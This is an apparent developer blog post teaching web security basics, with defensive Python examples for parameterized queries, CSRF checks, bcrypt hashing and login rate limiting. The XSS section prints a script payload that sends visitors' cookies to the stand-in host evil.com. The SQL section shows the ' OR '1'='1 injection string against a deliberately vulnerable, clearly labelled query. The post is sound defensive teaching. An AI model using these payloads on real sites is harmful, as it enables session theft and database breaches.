Web Security Basics Every Developer Must Know in 2025

A friend of mine launched a SaaS product last year. Beautiful UI, great features, paying customers within the first month. Then someone found an SQL injection vulnerability in the login form. They lost their entire user database. The business never recovered.

Security isn’t optional. It’s not something you “add later.” It needs to be part of how you think about code from day one.

SQL Injection: Still a Top Threat

If you’re building queries by concatenating strings, you’re vulnerable. Period.

# DANGEROUS - Never do this
query = "SELECT * FROM users WHERE email = '" + user_input + "'"

# SAFE - Use parameterized queries (%s is the placeholder for psycopg2/MySQLdb; sqlite3 uses ?)
cursor.execute("SELECT * FROM users WHERE email = %s", (user_input,))

With the dangerous version, entering ' OR '1'='1 turns the query into SELECT * FROM users WHERE email = '' OR '1'='1', whose WHERE clause is true for every row: a lookup returns every user record, and a login check matches the first user it finds. Parameterized queries send the SQL text and the values to the database separately, so the driver treats user input as data, never as SQL code. Two caveats: placeholders bind values only, not table or column names (check those against an allowlist), and an ORM protects you only as long as you don't drop into raw SQL built with string formatting.
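The following is an added example, not code from the original post. It runs the injection string above against both the concatenated and the parameterized query using an in-memory sqlite3 database (so it runs offline; sqlite3's placeholder is ? where the post's %s is the psycopg2/MySQLdb style), and it also shows the identifier case the caveat mentions, where a placeholder cannot help and an allowlist is used instead. The sample users and column allowlist are constructed for the demo.

```python
import sqlite3

# Added example, not code from the original post. Uses sqlite3 so it runs
# offline; sqlite3's placeholder is ? where psycopg2/MySQLdb use %s.

# Constructed sample users (not real data).
SAMPLE_USERS = [
    ("alice@example.com", "hash-a"),
    ("bob@example.com", "hash-b"),
]

ALLOWED_SORT_COLUMNS = {"id", "email"}  # allowlist for identifiers (assumed)

PAYLOAD = "' OR '1'='1"  # the injection string from the text


def make_db():
    """Create an in-memory database holding SAMPLE_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (email, password_hash) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def find_user_vulnerable(conn, user_input):
    # DANGEROUS: user_input is spliced into the SQL text and parsed as SQL.
    query = "SELECT email FROM users WHERE email = '" + user_input + "'"
    return [row[0] for row in conn.execute(query)]


def find_user_safe(conn, user_input):
    # SAFE: the driver sends the statement and the value separately, so the
    # payload is compared literally against the email column.
    rows = conn.execute("SELECT email FROM users WHERE email = ?", (user_input,))
    return [row[0] for row in rows]


def is_valid_sort_column(name):
    """Placeholders cannot bind identifiers, so ORDER BY columns go through an allowlist."""
    return name in ALLOWED_SORT_COLUMNS


def list_users_sorted(conn, sort_column):
    if not is_valid_sort_column(sort_column):
        raise ValueError("unknown sort column: %r" % sort_column)
    # Concatenation is acceptable here only because sort_column was just
    # checked against a fixed set of known column names.
    rows = conn.execute("SELECT email FROM users ORDER BY " + sort_column)
    return [row[0] for row in rows]


def demo():
    """Run the payload through both query styles and a normal lookup."""
    conn = make_db()
    return {
        "vulnerable": find_user_vulnerable(conn, PAYLOAD),
        "safe": find_user_safe(conn, PAYLOAD),
        "safe_real_lookup": find_user_safe(conn, "alice@example.com"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The vulnerable query returns both users for the payload; the parameterized one returns nothing, because no account has the literal email ' OR '1'='1, while a real address still resolves normally.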

Cross-Site Scripting (XSS)

XSS happens when you put user input into a page without escaping it for the context it lands in. If someone puts <script>document.location='https://evil.com/steal?cookie='+document.cookie</script> in a comment field and you render it as-is, every visitor's browser runs that script with your site's origin, which is why it can read document.cookie and send it to the attacker.

Prevention:

  • Always escape output for the context it goes into (HTML body, attribute, JavaScript string, URL). Your framework's template autoescaping covers the HTML context, so keep it on and avoid "safe"/"raw" filters on user-controlled data
  • Set a Content-Security-Policy header that disallows inline scripts and restricts script sources; it limits the damage when an escaping bug slips through
  • Set the HttpOnly flag on session cookies so injected JavaScript can't read them. This defeats the cookie-theft payload above but does not stop XSS itself: the script can still make requests as the logged-in user

Cross-Site Request Forgery (CSRF)

Imagine a user is logged into their bank. They visit a malicious site that auto-submits a hidden form, sending a transfer request to the bank. Because the browser attaches the bank's session cookies to that request, the bank cannot tell it apart from a request the user made deliberately, and it processes the transfer.

Prevention:

  • Use CSRF tokens in all state-changing forms: a random per-session (or per-request) value the attacker's page cannot read, compared server-side in constant time
  • Check the Origin header, falling back to Referer when Origin is absent; if neither is present on a state-changing request, reject it rather than assume it is safe
  • Set SameSite=Lax or Strict on session cookies. Lax still sends the cookie on top-level GET navigations, so never perform state changes on GET
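The following is an added example that implements the three bullets above together; it is not code from the original post. The allowed-origin set, the session/form/header dicts and the cookie string are constructed stand-ins for what a web framework would hand you. The token is generated with the standard secrets module and compared with hmac.compare_digest; the origin check treats a missing Origin and Referer as a failure.

```python
import hmac
import secrets

# Added example, not code from the original post. ALLOWED_ORIGINS and the
# request dicts are constructed; in a real app the origin list comes from
# configuration and session/form/headers come from your web framework.

ALLOWED_ORIGINS = {"https://bank.example"}


def issue_csrf_token():
    """Generate a per-session token; store it server-side and embed it in forms."""
    return secrets.token_urlsafe(32)


def origin_allowed(headers):
    """Check Origin, fall back to Referer, and reject when both are missing."""
    origin = headers.get("Origin")
    if origin is not None:
        # A cross-site form post carries the attacker's origin (or "null"),
        # neither of which is in the allowlist.
        return origin in ALLOWED_ORIGINS
    referer = headers.get("Referer")
    if referer:
        # Match on the origin plus a trailing slash so that
        # https://bank.example.evil.com/ does not pass as a prefix.
        return any(
            referer == allowed or referer.startswith(allowed + "/")
            for allowed in ALLOWED_ORIGINS
        )
    return False


def validate_state_change(session, form, headers):
    """Accept a state-changing request only if token and origin checks both pass."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    # compare_digest avoids leaking the token through timing differences.
    if not hmac.compare_digest(expected, submitted):
        return False
    return origin_allowed(headers)


def session_cookie(session_id):
    """Set-Cookie value for the session; SameSite=Lax stops cross-site POSTs carrying it."""
    return "session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % session_id


def demo():
    """A legitimate transfer form versus the hidden form from the text."""
    token = issue_csrf_token()
    session = {"csrf_token": token}
    legit = validate_state_change(
        session,
        {"csrf_token": token, "amount": "100"},
        {"Origin": "https://bank.example"},
    )
    # The attacker's page cannot read the token and posts from its own origin.
    forged = validate_state_change(
        session,
        {"amount": "100"},
        {"Origin": "https://evil.example"},
    )
    return {"legitimate": legit, "forged": forged}


if __name__ == "__main__":
    print(demo())
    print(session_cookie("example-session-id"))
```

Layering the token check with the origin check means a bug in one (a token leaked through a log, a proxy that strips Referer) does not by itself open the endpoint.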

Authentication Best Practices

  • Never store passwords in plain text or with a fast hash like MD5 or SHA-256. Use bcrypt or Argon2, which are salted and deliberately slow
  • Implement rate limiting on login endpoints, per account and per client IP, to slow brute force and credential stuffing
  • Use multi-factor authentication for sensitive operations
  • Set proper session timeouts, both idle and absolute
  • Invalidate all existing sessions on password change, and issue a fresh session ID on login

# Python example with bcrypt (pip install bcrypt)
import bcrypt

password = "correct horse battery staple"            # value supplied at signup
submitted_password = "correct horse battery staple"  # value supplied at login

# Hashing a password: gensalt() picks a random salt and the work factor (cost 12 by
# default); the returned bytes embed salt and cost, so store them as-is.
# Note that bcrypt only looks at the first 72 bytes of the input.
hashed = bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt())
stored_hash = hashed  # what you would read back from the users table

# Verifying a password: checkpw re-derives the hash with the stored salt and cost
if bcrypt.checkpw(submitted_password.encode('utf-8'), stored_hash):
    print("Login successful")
else:
    print("Invalid credentials")
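The rate-limiting bullet above is the one practice in this list that the post does not show in code, so here is an added example of a sliding-window login limiter, not code from the original post. The limit, window and the username-plus-IP keying are assumptions to tune for your own traffic; the credential store is a constructed stand-in for bcrypt.checkpw, and the `now` argument exists so the limiter can be exercised without waiting real seconds.

```python
import hmac
import time
from collections import defaultdict, deque

# Added example, not code from the original post. Limit, window and the
# username/IP keying are assumptions; DEMO_USERS is a constructed stand-in.


class LoginRateLimiter:
    """Sliding-window limiter: at most `limit` attempts per `window` seconds per key."""

    def __init__(self, limit=5, window=60.0):
        self.limit = limit
        self.window = float(window)
        self._attempts = defaultdict(deque)  # key -> timestamps of recent attempts

    def _recent(self, key, now):
        # Drop attempts that have aged out of the window.
        attempts = self._attempts[key]
        while attempts and now - attempts[0] >= self.window:
            attempts.popleft()
        return attempts

    def allow(self, key, now=None):
        """Record an attempt and return True if it is within the limit."""
        now = time.monotonic() if now is None else now
        attempts = self._recent(key, now)
        if len(attempts) >= self.limit:
            return False
        attempts.append(now)
        return True

    def retry_after(self, key, now=None):
        """Seconds until the next attempt for `key` would be allowed (0 if allowed now)."""
        now = time.monotonic() if now is None else now
        attempts = self._recent(key, now)
        if len(attempts) < self.limit:
            return 0.0
        return self.window - (now - attempts[0])


def login_key(username, client_ip):
    # Keying on the pair slows a brute force against one account without letting
    # a single attacker lock out everyone behind a shared IP; add a second,
    # per-IP limiter to catch credential stuffing spread across many accounts.
    return "%s|%s" % (username.strip().lower(), client_ip)


# Constructed credential store for the demo only; a real app keeps bcrypt hashes
# and calls bcrypt.checkpw here.
DEMO_USERS = {"alice": "correct horse battery staple"}


def demo_verify(username, password):
    stored = DEMO_USERS.get(username, "")
    return hmac.compare_digest(stored.encode("utf-8"), password.encode("utf-8"))


def attempt_login(limiter, username, password, client_ip, verify, now=None):
    """Apply the limiter before the (deliberately slow) password check."""
    key = login_key(username, client_ip)
    if not limiter.allow(key, now):
        return "rate_limited"
    return "ok" if verify(username, password) else "invalid"


if __name__ == "__main__":
    limiter = LoginRateLimiter(limit=3, window=60)
    for guess in ("hunter2", "password", "letmein", "correct horse battery staple"):
        print(guess, "->", attempt_login(limiter, "alice", guess, "203.0.113.7", demo_verify))
    print("retry after", limiter.retry_after(login_key("alice", "203.0.113.7")), "s")
```

Checking the limiter before the password hash matters: bcrypt is expensive by design, so an unlimited login endpoint is also a CPU-exhaustion target.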

HTTPS Everywhere

There’s no excuse in 2025 for not using HTTPS. Let’s Encrypt is free. Without HTTPS, anyone on the same network can read everything your users send and receive (passwords, personal data, everything) and can also modify it in transit, injecting scripts or stripping the security headers you set. Redirect HTTP to HTTPS, mark cookies Secure, and send a Strict-Transport-Security header so browsers never fall back to plain HTTP for your site.

The Security Mindset

The most important security practice isn’t any specific technique – it’s the mindset. Every time you handle user input, ask yourself: “What’s the worst thing someone could put in here?” That single question, followed through with validation on the way in and context-aware encoding on the way out, will prevent most of the vulnerabilities covered here.

Security isn’t about being paranoid. It’s about being responsible. Your users trust you with their data. Don’t let them down.
